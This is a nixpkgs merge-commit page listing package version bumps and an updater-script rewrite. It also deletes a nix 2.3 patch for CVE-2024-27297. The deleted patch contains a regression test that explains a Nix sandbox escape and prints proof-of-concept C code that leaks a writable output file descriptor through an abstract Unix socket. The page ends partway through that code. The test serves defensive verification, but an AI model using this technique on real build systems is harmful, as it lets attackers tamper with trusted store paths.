cafkafk/nixpkgs
cafkafk/nixpkgs
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 2

Merge master into staging-next

Browse source
This commit is contained in:
github-actions[bot] 2024-04-28 18:01:03 +00:00 committed by GitHub
commit 69117017f0
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
22 changed files with 334 additions and 566 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
pkgs/applications/misc/remnote/default.nix
View file

@ -6,11 +6,11 @@ stdenv.mkDerivation (finalAttrs: let
in
{
pname = "remnote";
version = "1.15.4";
version = "1.16.4";
src = fetchurl {
url = "https://download.remnote.io/remnote-desktop/RemNote-${version}.AppImage";
hash = "sha256-6WBdTOj/seinx1wJGb/4if3PzCPmtzHyNAFmQwmsrvE=";
hash = "sha256-dgbQ0cbPq7BSQ9VwwH6+GoAxb85HDxRixfjeDJBtOrg=";
};
appexec = appimageTools.wrapType2 {

15
pkgs/applications/networking/browsers/firefox/common.nix
View file

@ -298,9 +298,6 @@ buildStdenv.mkDerivation {
setOutputFlags = false; # `./mach configure` doesn't understand `--*dir=` flags.
preConfigure = ''
# remove distributed configuration files
rm -f configure js/src/configure .mozconfig*
# Runs autoconf through ./mach configure in configurePhase
configureScript="$(realpath ./mach) configure"
@ -308,8 +305,8 @@ buildStdenv.mkDerivation {
export MOZ_BUILD_DATE=$(head -n1 sourcestamp.txt)
# Set predictable directories for build and state
export MOZ_OBJDIR=$(pwd)/mozobj
export MOZBUILD_STATE_PATH=$(pwd)/mozbuild
export MOZ_OBJDIR=$(pwd)/objdir
export MOZBUILD_STATE_PATH=$TMPDIR/mozbuild
# Don't try to send libnotify notifications during build
export MOZ_NOSPAM=1
@ -353,7 +350,7 @@ buildStdenv.mkDerivation {
# since the profiling build has not been installed to $out
''
OLD_LDFLAGS="$LDFLAGS"
LDFLAGS="-Wl,-rpath,$(pwd)/mozobj/dist/${binaryName}"
LDFLAGS="-Wl,-rpath,$(pwd)/objdir/dist/${binaryName}"
''}
fi
'' + lib.optionalString googleAPISupport ''
@ -510,7 +507,7 @@ buildStdenv.mkDerivation {
'';
preBuild = ''
cd mozobj
cd objdir
'';
postBuild = ''
@ -535,9 +532,9 @@ buildStdenv.mkDerivation {
preInstall = lib.optionalString crashreporterSupport ''
./mach buildsymbols
mkdir -p $symbols/
cp mozobj/dist/*.crashreporter-symbols.zip $symbols/
cp objdir/dist/*.crashreporter-symbols.zip $symbols/
'' + ''
cd mozobj
cd objdir
'';
postInstall = ''

58
pkgs/applications/science/biology/mafft/default.nix
View file

@ -1,14 +1,20 @@
{ lib, stdenv, fetchFromGitLab }:
{
lib,
stdenv,
fetchFromGitLab,
runCommand,
mafft,
}:
stdenv.mkDerivation rec {
stdenv.mkDerivation (finalAttrs: {
pname = "mafft";
version = "7.525";
version = "7.526";
src = fetchFromGitLab {
owner = "sysimm";
repo = pname;
rev = "v${version}";
sha256 = "sha256-ckBmvFssYAmYcBHAEftjQqBV0MB0theGfemaPx3XUws=";
repo = "mafft";
rev = "v${finalAttrs.version}";
hash = "sha256-VNe00r12qEkLEbpZdJCe5xZ73JA3uAmuAeG+eSeRDI0=";
};
preBuild = ''
@ -16,14 +22,34 @@ stdenv.mkDerivation rec {
make clean
'';
makeFlags = [ "CC=${stdenv.cc.targetPrefix}cc" "PREFIX=$(out)" ];
makeFlags = [
"CC=${stdenv.cc.targetPrefix}cc"
"PREFIX=$(out)"
];
meta = with lib;
{
description = "Multiple alignment program for amino acid or nucleotide sequences";
homepage = "https://mafft.cbrc.jp/alignment/software/";
license = licenses.bsd3;
maintainers = with maintainers; [ natsukium ];
platforms = platforms.unix;
};
}
passthru.tests = {
simple = runCommand "${finalAttrs.pname}-test" { } ''
mkdir $out
cd ${finalAttrs.src}/test
${lib.getExe mafft} sample > $out/test.fftns2
${lib.getExe mafft} --maxiterate 100 sample > $out/test.fftnsi
${lib.getExe mafft} --globalpair sample > $out/test.gins1
${lib.getExe mafft} --globalpair --maxiterate 100 sample > $out/test.ginsi
${lib.getExe mafft} --localpair sample > $out/test.lins1
${lib.getExe mafft} --localpair --maxiterate 100 sample > $out/test.linsi
diff $out/test.fftns2 sample.fftns2
diff $out/test.fftnsi sample.fftnsi
diff $out/test.gins1 sample.gins1
diff $out/test.ginsi sample.ginsi
diff $out/test.lins1 sample.lins1
'';
};
meta = with lib; {
description = "Multiple alignment program for amino acid or nucleotide sequences";
homepage = "https://mafft.cbrc.jp/alignment/software/";
license = licenses.bsd3;
maintainers = with maintainers; [ natsukium ];
platforms = platforms.unix;
};
})

6
pkgs/by-name/la/labelle/package.nix
View file

@ -8,14 +8,14 @@
}:
python3Packages.buildPythonApplication rec {
pname = "labelle";
version = "1.1.0";
version = "1.2.0";
pyproject = true;
src = fetchFromGitHub {
owner = "labelle-org";
repo = "labelle";
rev = "v${version}";
hash = "sha256-JnV5A3/toTCHCEb0dygouR9MZfk2kdmsKVscwYI2y/Y=";
hash = "sha256-fLlYqJs/V5t8IdfVkfBsjtjM1rRdCyTYF87G+h1VU5Y=";
};
postPatch = ''
@ -39,6 +39,8 @@ python3Packages.buildPythonApplication rec {
pyqt6
python-barcode
pyusb
rich
typer
];
desktopItems = [

7
pkgs/by-name/tu/tuifimanager/package.nix
View file

@ -5,14 +5,14 @@
python3.pkgs.buildPythonApplication rec {
pname = "tuifimanager";
version = "4.0.0";
version = "4.0.5";
format = "pyproject";
src = fetchFromGitHub {
owner = "GiorgosXou";
repo = "TUIFIManager";
rev = "v${version}";
hash = "sha256-bv/+x2xppUK9i3HOm93FIQRu1xlB4wCKZzAapkVlrM0=";
rev = "refs/tags/v${version}";
hash = "sha256-DuCrIJuADmJ0MHIP0+OJ0zCrQR/oGdgzJ1xck4m/tPo=";
};
nativeBuildInputs = [
@ -34,7 +34,6 @@ python3.pkgs.buildPythonApplication rec {
attempt to get more attention to the Uni-Curses project.
'';
homepage = "https://github.com/GiorgosXou/TUIFIManager";
changelog = "https://github.com/GiorgosXou/TUIFIManager/blob/${src.rev}/CHANGELOG.md";
license = licenses.gpl3Only;
maintainers = with maintainers; [ michaelBelsanti sigmanificient ];
mainProgram = "tuifi";

4
pkgs/by-name/wl/wlogout/package.nix
View file

@ -20,13 +20,13 @@
stdenv.mkDerivation (finalAttrs: {
pname = "wlogout";
version = "1.2.1";
version = "1.2.2";
src = fetchFromGitHub {
owner = "ArtsyMacaw";
repo = "wlogout";
rev = finalAttrs.version;
hash = "sha256-n8r+E6GXXjyDYBTOMiv5musamaUFSpRTM2qHgb047og=";
hash = "sha256-/tYZy56ku68ziSOhy6Dex9RGy+blkU6CN2ze76y7718=";
};
outputs = [ "out" "man" ];

224
pkgs/common-updater/unstable-updater.nix
View file

@ -1,5 +1,5 @@
{ lib
, writeShellScript
, writeShellApplication
, coreutils
, git
, nix
@ -10,114 +10,162 @@
# commit.
{ url ? null # The git url, if empty it will be set to src.gitRepoUrl
, branch ? null
, stableVersion ? false # Use version format according to RFC 107 (i.e. LAST_TAG+date=YYYY-MM-DD)
, tagPrefix ? "" # strip this prefix from a tag name when using stable version
, hardcodeZeroVersion ? false # Use a made-up version "0" instead of latest tag. Use when there is no previous release, or the project's tagging system is incompatible with what we expect from versions
, tagFormat ? "*" # A `git describe --tags --match '<format>'` pattern that tags must match to be considered
, tagPrefix ? null # strip this prefix from a tag name
, tagConverter ? null # A command to convert more complex tag formats. It receives the git tag via stdin and should convert it into x.y.z format to stdout
, shallowClone ? true
}:
assert lib.asserts.assertMsg (tagPrefix == null || tagConverter == null) "Can only use either tagPrefix or tagConverter!";
let
updateScript = writeShellScript "unstable-update-script.sh" ''
set -ex
updateScript = writeShellApplication {
name = "unstable-update-script";
runtimeInputs = [
common-updater-scripts
coreutils
git
nix
];
text = ''
set -ex
url=""
branch=""
use_stable_version=""
tag_prefix=""
shallow_clone=""
url=""
branch=""
hardcode_zero_version=""
tag_format=""
tag_prefix=""
tag_converter=""
shallow_clone=""
: "''${systemArg:=}"
while (( $# > 0 )); do
flag="$1"
shift 1
case "$flag" in
--url=*)
url="''${flag#*=}"
;;
--branch=*)
branch="''${flag#*=}"
;;
--use-stable-version)
use_stable_version=1
;;
--tag-prefix=*)
tag_prefix="''${flag#*=}"
;;
--shallow-clone)
shallow_clone=1
;;
*)
echo "$0: unknown option ''${flag}"
exit 1
;;
esac
done
while (( $# > 0 )); do
flag="$1"
shift 1
case "$flag" in
--url=*)
url="''${flag#*=}"
;;
--branch=*)
branch="''${flag#*=}"
;;
--hardcode-zero-version)
hardcode_zero_version=1
;;
--tag-format=*)
tag_format="''${flag#*=}"
;;
--tag-prefix=*)
tag_prefix="''${flag#*=}"
;;
--tag-converter=*)
tag_converter="''${flag#*=}"
;;
--shallow-clone)
shallow_clone=1
;;
*)
echo "$0: unknown option ''${flag}"
exit 1
;;
esac
done
# By default we set url to src.gitRepoUrl
if [[ -z "$url" ]]; then
url="$(${nix}/bin/nix-instantiate $systemArg --eval -E \
"with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
| tr -d '"')"
fi
# By default we set url to src.gitRepoUrl
if [[ -z "$url" ]]; then
# system argument cannot be passed as 1 argument
# shellcheck disable=SC2086
url="$(nix-instantiate $systemArg --eval -E \
"with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
| tr -d '"')"
fi
# Get info about HEAD from a shallow git clone
tmpdir="$(${coreutils}/bin/mktemp -d)"
# Get info about HEAD from a shallow git clone
tmpdir="$(mktemp -d)"
cloneArgs=(
--bare
)
cloneArgs=()
if [[ "$shallow_clone" == "1" ]]; then
cloneArgs+=(--depth=1)
fi
if [[ "$shallow_clone" == "1" ]]; then
cloneArgs+=(--depth=1)
fi
if [[ -n "$branch" ]]; then
cloneArgs+=(--branch="$branch")
fi
if [[ -n "$branch" ]]; then
cloneArgs+=(--branch="$branch")
fi
${git}/bin/git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
getLatestVersion() {
git describe --tags --abbrev=0 --match "''${tag_format}" 2> /dev/null || true
}
pushd "$tmpdir"
commit_date="$(${git}/bin/git show -s --pretty='format:%cs')"
commit_sha="$(${git}/bin/git show -s --pretty='format:%H')"
if [[ -z "$use_stable_version" ]]; then
new_version="unstable-$commit_date"
else
depth=100
while (( $depth < 10000 )); do
last_tag="$(${git}/bin/git describe --tags --abbrev=0 2> /dev/null || true)"
if [[ -n "$last_tag" ]]; then
break
fi
${git}/bin/git fetch --depth="$depth" --tags
depth=$(( $depth * 2 ))
done
if [[ -z "$last_tag" ]]; then
echo "Cound not found a tag within last 10000 commits" > /dev/stderr
exit 1
fi
if [[ -n "$tag_prefix" ]]; then
last_tag="''${last_tag#$tag_prefix}"
fi
new_version="$last_tag+date=$commit_date"
fi
popd
# ${coreutils}/bin/rm -rf "$tmpdir"
pushd "$tmpdir"
commit_date="$(git show -s --pretty='format:%cs')"
commit_sha="$(git show -s --pretty='format:%H')"
last_tag=""
if [[ -z "$hardcode_zero_version" ]]; then
if [[ "$shallow_clone" == "1" ]]; then
depth=100
while (( depth < 10000 )); do
last_tag="$(getLatestVersion)"
if [[ -n "$last_tag" ]]; then
break
fi
git fetch --depth="$depth" --tags
depth=$(( depth * 2 ))
done
# update the nix expression
${common-updater-scripts}/bin/update-source-version \
"$UPDATE_NIX_ATTR_PATH" \
"$new_version" \
--rev="$commit_sha"
'';
if [[ -z "$last_tag" ]]; then
# To be extra sure, check if full history helps with finding a tag
git fetch --tags
last_tag="$(getLatestVersion)"
fi
else
last_tag="$(getLatestVersion)"
fi
if [[ -z "$last_tag" ]]; then
last_tag="0"
fi
if [[ -n "$tag_prefix" ]]; then
echo "Stripping prefix '$tag_prefix' from tag '$last_tag'"
last_tag="''${last_tag#"''${tag_prefix}"}"
fi
if [[ -n "$tag_converter" ]]; then
echo "Running '$last_tag' through: $tag_converter"
last_tag="$(echo "''${last_tag}" | ''${tag_converter})"
fi
else
last_tag="0"
fi
if [[ ! "$last_tag" =~ ^[[:digit:]] ]]; then
echo "Last tag '$last_tag' does not start with a digit" > /dev/stderr
exit 1
fi
new_version="$last_tag-unstable-$commit_date"
popd
# rm -rf "$tmpdir"
# update the nix expression
update-source-version \
"$UPDATE_NIX_ATTR_PATH" \
"$new_version" \
--rev="$commit_sha"
'';
};
in
[
updateScript
(lib.getExe updateScript)
"--url=${builtins.toString url}"
"--tag-format=${tagFormat}"
] ++ lib.optionals (branch != null) [
"--branch=${branch}"
] ++ lib.optionals stableVersion [
"--use-stable-version"
] ++ lib.optionals (tagPrefix != null) [
"--tag-prefix=${tagPrefix}"
] ++ lib.optionals (tagConverter != null) [
"--tag-converter=${tagConverter}"
] ++ lib.optionals hardcodeZeroVersion [
"--hardcode-zero-version"
] ++ lib.optionals shallowClone [
"--shallow-clone"
]

29
pkgs/development/libraries/babl/default.nix
View file

@ -1,30 +1,36 @@
{ stdenv
, lib
, fetchpatch
, fetchurl
, meson
, ninja
, pkg-config
, gi-docgen
, gobject-introspection
, lcms2
, vala
}:
stdenv.mkDerivation rec {
stdenv.mkDerivation (finalAttrs: {
pname = "babl";
version = "0.1.106";
version = "0.1.108";
outputs = [ "out" "dev" ];
outputs = [ "out" "dev" "devdoc" ];
src = fetchurl {
url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor version}/babl-${version}.tar.xz";
hash = "sha256-0yUTXTME8IjBNMxiABOs8DXeLl0SWlCi2RBU5zd8QV8=";
url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor finalAttrs.version}/babl-${finalAttrs.version}.tar.xz";
hash = "sha256-Jt7+neqresTQ4HbKtJwqDW69DfDDH9IJklpfB+3uFHU=";
};
patches = [
# Allow overriding path to dev output that will be hardcoded e.g. in pkg-config file.
./dev-prefix.patch
];
nativeBuildInputs = [
meson
ninja
pkg-config
gi-docgen
gobject-introspection
vala
];
@ -33,6 +39,15 @@ stdenv.mkDerivation rec {
lcms2
];
mesonFlags = [
"-Dprefix-dev=${placeholder "dev"}"
];
postFixup = ''
# Cannot be in postInstall, otherwise _multioutDocs hook in preFixup will move right back.
moveToOutput "share/doc" "$devdoc"
'';
meta = with lib; {
description = "Image pixel format conversion library";
mainProgram = "babl";
@ -42,4 +57,4 @@ stdenv.mkDerivation rec {
maintainers = with maintainers; [ jtojnar ];
platforms = platforms.unix;
};
}
})

29
pkgs/development/libraries/babl/dev-prefix.patch Normal file
View file

@ -0,0 +1,29 @@
diff --git a/meson.build b/meson.build
index 2350a1f..56f015d 100644
--- a/meson.build
+++ b/meson.build
@@ -551,7 +551,7 @@ pkgconfig.generate(
variables: [
'datadir=${prefix}/share',
'pluginsdir=${libdir}/@0@'.format(lib_name),
- 'girdir=${datadir}/gir-1.0',
+ 'girdir=@0@/share/gir-1.0'.format(get_option('prefix-dev')),
'typelibdir=${libdir}/girepository-1.0',
],
uninstalled_variables: [
diff --git a/meson_options.txt b/meson_options.txt
index f9d558c..3cac593 100644
--- a/meson_options.txt
+++ b/meson_options.txt
@@ -9,6 +9,11 @@ option('enable-gir',
choices: ['auto', 'true', 'false'],
description: 'gobject introspection .gir generation'
)
+option('prefix-dev',
+ type: 'string',
+ value: '',
+ description: 'Like prefix but for dev output of the package'
+)
option('enable-vapi',
type: 'boolean',
value: 'true',

4
pkgs/development/libraries/wlroots/default.nix
View file

@ -125,8 +125,8 @@ rec {
};
wlroots_0_17 = generic {
version = "0.17.2";
hash = "sha256-Of9qykyVnBURc5A2pvCMm7sLbnuuG7OPWLxodQLN2Xg=";
version = "0.17.3";
hash = "sha256-jth6BKci3sVDC86o+gSHKyDWnibVcNmipm7nn0S6LTg=";
extraBuildInputs = [
ffmpeg
hwdata

4
pkgs/development/python-modules/anywidget/default.nix
View file

@ -14,14 +14,14 @@
buildPythonPackage rec {
pname = "anywidget";
version = "0.9.9";
version = "0.9.10";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-vs5tYcVabzlkCeu1p20mDo9LIh+cUeUWFQc3o18WUu8=";
hash = "sha256-OQpigkCYHAmBPHUjJ53cq4L/T9Moet1UM7eLE2kIkGg=";
};
# We do not need the jupyterlab build dependency, because we do not need to

19
pkgs/development/python-modules/ipycanvas/default.nix
View file

@ -2,7 +2,7 @@
, buildPythonPackage
, fetchPypi
, pythonOlder
, jupyter-packaging
, hatchling
, ipywidgets
, numpy
, pillow
@ -10,14 +10,14 @@
buildPythonPackage rec {
pname = "ipycanvas";
version = "0.13.1";
format = "pyproject";
version = "0.13.2";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-+cOUBoG8ODgzkPjEbqXYRF1uEcbaZITDfYnfWuHawTE=";
hash = "sha256-Ujh9nYf2WVXzlVL7eSfEReXl5JN9hTgU2RDL6O+g+3k=";
};
# We relax dependencies here instead of pulling in a patch because upstream
@ -26,13 +26,16 @@ buildPythonPackage rec {
#
postPatch = ''
substituteInPlace pyproject.toml \
--replace '"jupyterlab==3.*",' "" \
--replace 'jupyter_packaging~=' 'jupyter_packaging>='
--replace-fail '"jupyterlab>=3,<5",' "" \
'';
nativeBuildInputs = [ jupyter-packaging ];
build-system = [
hatchling
];
propagatedBuildInputs = [ ipywidgets numpy pillow ];
env.HATCH_BUILD_NO_HOOKS = true;
dependencies = [ ipywidgets numpy pillow ];
doCheck = false; # tests are in Typescript and require `npx` and `chromium`
pythonImportsCheck = [ "ipycanvas" ];

8
pkgs/development/python-modules/ipyniivue/default.nix
View file

@ -3,21 +3,21 @@
, fetchPypi
, pythonOlder
, hatchling
, hatch-jupyter-builder
, hatch-vcs
, anywidget
, pytestCheckHook
}:
buildPythonPackage rec {
pname = "ipyniivue";
version = "2.0.0";
version = "2.0.1";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-CvMSUvPyXxPexs0/0sa/xt65RFWtvmYZwGSMIQGvLkc=";
hash = "sha256-C0mYkguN4ZfxSLqETH3dUwXeoNcicrmAgp6e9IIT43s=";
};
# We do not need the build hooks, because we do not need to
@ -26,7 +26,7 @@ buildPythonPackage rec {
build-system = [
hatchling
hatch-jupyter-builder
hatch-vcs
];
dependencies = [ anywidget ];

4
pkgs/development/python-modules/jupyterlab-server/default.nix
View file

@ -21,7 +21,7 @@
buildPythonPackage rec {
pname = "jupyterlab-server";
version = "2.26.0";
version = "2.27.1";
pyproject = true;
disabled = pythonOlder "3.8";
@ -29,7 +29,7 @@ buildPythonPackage rec {
src = fetchPypi {
pname = "jupyterlab_server";
inherit version;
hash = "sha256-mzupHPKDf38ST8o21j88qArOK+1ImKY91H5lmMGrAG8=";
hash = "sha256-CXtaxwm2dscoSsnF43PxGTClYfUs1ahuT8flqcioYx0=";
};
postPatch = ''

4
pkgs/development/python-modules/jupyterlab/default.nix
View file

@ -20,14 +20,14 @@
buildPythonPackage rec {
pname = "jupyterlab";
version = "4.1.6";
version = "4.1.8";
pyproject = true;
disabled = pythonOlder "3.8";
src = fetchPypi {
inherit pname version;
hash = "sha256-eTXza6JuthUYOk9cK7yleRtRCM4qALVQX4z9EA1TZI4=";
hash = "sha256-M4St7YaA585QT9Y7i7iaOd8hycdpTZ59xKaHQs2zD5s=";
};
nativeBuildInputs = [

34
pkgs/development/python-modules/nbdev/default.nix
View file

@ -1,40 +1,50 @@
{ lib
, buildPythonPackage
, fetchPypi
, fastprogress
, pythonRelaxDepsHook
, setuptools
, ipywidgets
, fastcore
, asttokens
, astunparse
, watchdog
, execnb
, ghapi
, pyyaml
, quarto
, pythonOlder
}:
buildPythonPackage rec {
pname = "nbdev";
version = "2.3.13";
format = "setuptools";
version = "2.3.14";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-Umkf3CcRRSS+pK3UKeTg+Ru3TW+qHNoQ2F6nUk8jQUU=";
hash = "sha256-9Tacr4mWmjXspKKCkFDWYeT7KkBh4/3f6UOkfj0/leg=";
};
propagatedBuildInputs = [
fastprogress
fastcore
asttokens
nativeBuildInputs = [
pythonRelaxDepsHook
];
pythonRelaxDeps = [
"ipywidgets"
];
build-system = [
setuptools
];
dependencies = [
astunparse
watchdog
execnb
fastcore
ghapi
ipywidgets
pyyaml
quarto
watchdog
];
# no real tests

4
pkgs/development/python-modules/nvidia-ml-py/default.nix
View file

@ -7,13 +7,13 @@
buildPythonPackage rec {
pname = "nvidia-ml-py";
version = "12.535.133";
version = "12.550.52";
format = "setuptools";
src = fetchPypi {
inherit pname version;
extension = "tar.gz";
hash = "sha256-sVWa8NV90glVv1jQWv/3sWbd1ElH6zBRyZBWOHmesdw=";
hash = "sha256-3+3XFDNccuZaMshun12xzUlSbUTW2McoCdmWlY9zTAc=";
};
patches = [

20
pkgs/development/python-modules/papermill/default.nix
View file

@ -1,5 +1,7 @@
{ lib
, stdenv
, aiohttp
, ansicolors
, azure-datalake-store
, azure-identity
, azure-storage-blob
@ -17,8 +19,8 @@
, pygithub
, pytest-mock
, pytestCheckHook
, pythonAtLeast
, pythonOlder
, pythonRelaxDepsHook
, pyyaml
, requests
, setuptools
@ -28,7 +30,7 @@
buildPythonPackage rec {
pname = "papermill";
version = "2.5.0";
version = "2.6.0";
pyproject = true;
disabled = pythonOlder "3.8";
@ -37,19 +39,14 @@ buildPythonPackage rec {
owner = "nteract";
repo = "papermill";
rev = "refs/tags/${version}";
hash = "sha256-x6f5hhTdOPDVFiBvRhfrXq1wd5keYiuUshXnT0IkjX0=";
hash = "sha256-NxC5+hRDdMCl/7ZIho5ml4hdENrgO+wzi87GRPeMv8Q=";
};
pythonRelaxDeps = [
"aiohttp"
];
nativeBuildInputs = [
pythonRelaxDepsHook
build-system = [
setuptools
];
propagatedBuildInputs = [
dependencies = [
click
pyyaml
nbformat
@ -58,6 +55,9 @@ buildPythonPackage rec {
requests
entrypoints
tenacity
ansicolors
] ++ lib.optionals (pythonAtLeast "3.12") [
aiohttp
];
passthru.optional-dependencies = {

4
pkgs/development/python-modules/plotnine/default.nix
View file

@ -17,7 +17,7 @@
buildPythonPackage rec {
pname = "plotnine";
version = "0.13.4";
version = "0.13.5";
pyproject = true;
disabled = pythonOlder "3.9";
@ -26,7 +26,7 @@ buildPythonPackage rec {
owner = "has2k1";
repo = "plotnine";
rev = "refs/tags/v${version}";
hash = "sha256-ylsaV5yWVbxvD74spAI5tDwIjjue7MOMaGgp4Dc8Nhk=";
hash = "sha256-vGxsBcY4CRT4rBUq0AQ4oo0etKK+CtUD487VvnoK/rI=";
};
postPatch = ''

9
pkgs/tools/package-management/nix/default.nix
View file

@ -133,11 +133,10 @@ let
in lib.makeExtensible (self: ({
nix_2_3 = ((common {
version = "2.3.17";
hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4=";
version = "2.3.18";
hash = "sha256-jBz2Ub65eFYG+aWgSI3AJYvLSghio77fWQiIW1svA9U=";
patches = [
patch-monitorfdhup
./patches/2_3/CVE-2024-27297.patch
];
maintainers = with lib.maintainers; [ flokli raitobezarius ];
}).override { boehmgc = boehmgc-nix_2_3; }).overrideAttrs {
@ -157,8 +156,8 @@ in lib.makeExtensible (self: ({
};
nix_2_20 = common {
version = "2.20.5";
hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ=";
version = "2.20.6";
hash = "sha256-BSl8Jijq1A4n1ToQy0t0jDJCXhJK+w1prL8QMHS5t54=";
};
nix_2_21 = common {

375
pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch
View file

@ -1,375 +0,0 @@
From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Mon, 12 Feb 2024 21:28:20 +0100
Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape
Test that we can't leverage abstract unix domain sockets to leak file
descriptors out of the sandbox and modify the path after it has been
registered.
---
release.nix | 5 ++
tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++
tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++
tests/nixos/ca-fd-leak/smuggler.c | 66 +++++++++++++++++++++
4 files changed, 229 insertions(+)
create mode 100644 tests/nixos/ca-fd-leak/default.nix
create mode 100644 tests/nixos/ca-fd-leak/sender.c
create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
diff --git a/release.nix b/release.nix
index f468946c5..2e71f3796 100644
--- a/release.nix
+++ b/release.nix
@@ -235,6 +235,11 @@ let
nix = build.x86_64-linux; system = "x86_64-linux";
});
+ tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec {
+ inherit nixpkgs;
+ nix = build.x86_64-linux; system = "x86_64-linux";
+ });
+
tests.setuid = pkgs.lib.genAttrs
["i686-linux" "x86_64-linux"]
(system:
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..c252caa4d
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,93 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ nixpkgs, system, nix }:
+
+with import (nixpkgs + "/nixos/lib/testing-python.nix") {
+ inherit system;
+};
+
+let
+ # Simple C program that sends a a file descriptor to `$out` to a Unix
+ # domain socket.
+ # Compiled statically so that we can easily send it to the VM and use it
+ # inside the build sandbox.
+ sender = pkgs.runCommandWith {
+ name = "sender";
+ stdenv = pkgs.pkgsStatic.stdenv;
+ } ''
+ $CC -static -o $out ${./sender.c}
+ '';
+
+ # Okay, so we have a file descriptor shipped out of the FOD now. But the
+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+ # lives in a mount namespace where it is not! So even when this file exists
+ # in the actual Nix store, we're capable of just modifying its contents...
+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+ # The abstract socket path used to exfiltrate the file descriptor
+ socketName = "FODSandboxExfiltrationSocket";
+in
+makeTest {
+ name = "ca-fd-leak";
+
+ nodes.machine =
+ { config, lib, pkgs, ... }:
+ { virtualisation.writableStore = true;
+ virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+ nix.binaryCaches = [ ];
+ nix.package = nix;
+ };
+
+ testScript = { nodes }: ''
+ start_all()
+
+ machine.succeed("echo hello")
+ # Start the smuggler server
+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+ # Build the smuggled derivation.
+ # This will connect to the smuggler server and send it the file descriptor
+ machine.succeed(r"""
+ nix-build -E '
+ builtins.derivation {
+ name = "smuggled";
+ system = builtins.currentSystem;
+ # look ma, no tricks!
+ outputHashMode = "flat";
+ outputHashAlgo = "sha256";
+ outputHash = builtins.hashString "sha256" "hello, world\n";
+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+ }'
+ """.strip())
+
+
+ # Tell the smuggler server that we're done
+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+ # Check that the file was modified
+ machine.succeed(r"""
+ cat ./result
+ test "$(cat ./result)" = "hello, world"
+ """.strip())
+ '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Set up a abstract domain socket path to connect to.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+
+ // Now try to connect, To ensure we work no matter what order we are
+ // executed in, just busyloop here.
+ int res = -1;
+ while (res < 0) {
+ res = connect(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0 && errno != ECONNREFUSED) perror("connect");
+ if (errno != ECONNREFUSED) break;
+ }
+
+ // Write our message header.
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Write an SCM_RIGHTS message containing the output path.
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ hdr->cmsg_len = CMSG_LEN(sizeof(int));
+ hdr->cmsg_level = SOL_SOCKET;
